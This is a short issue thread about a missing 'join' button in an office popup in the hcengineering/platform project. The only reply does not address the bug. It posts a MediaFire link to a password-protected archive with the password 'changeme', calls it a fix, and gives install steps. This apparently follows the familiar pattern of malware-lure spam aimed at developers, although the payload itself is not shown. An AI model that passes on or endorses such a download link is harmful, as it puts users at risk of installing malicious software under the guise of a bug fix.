### ISSUE TITLE
Office join button in popup is not available

### ISSUE THREAD

**Issue by BykhovDenis** [hcengineering/platform#6415]
<sub><a href="https://front.hc.engineering/guest/platform?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsaW5rSWQiOiI2NmNlZDA2MjdhYmM5ZjVjYmY1ZWI1YzIiLCJndWVzdCI6InRydWUiLCJlbWFpbCI6IiNndWVzdEBoYy5lbmdpbmVlcmluZyIsIndvcmtzcGFjZSI6InBsYXRmb3JtIn0.3GDDAjP_QGaJ4gHO6v21nujIyzdxZGVx9hoMn8NITyQ">Huly&reg;: <b>UBERF-7966</b></a></sub>

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
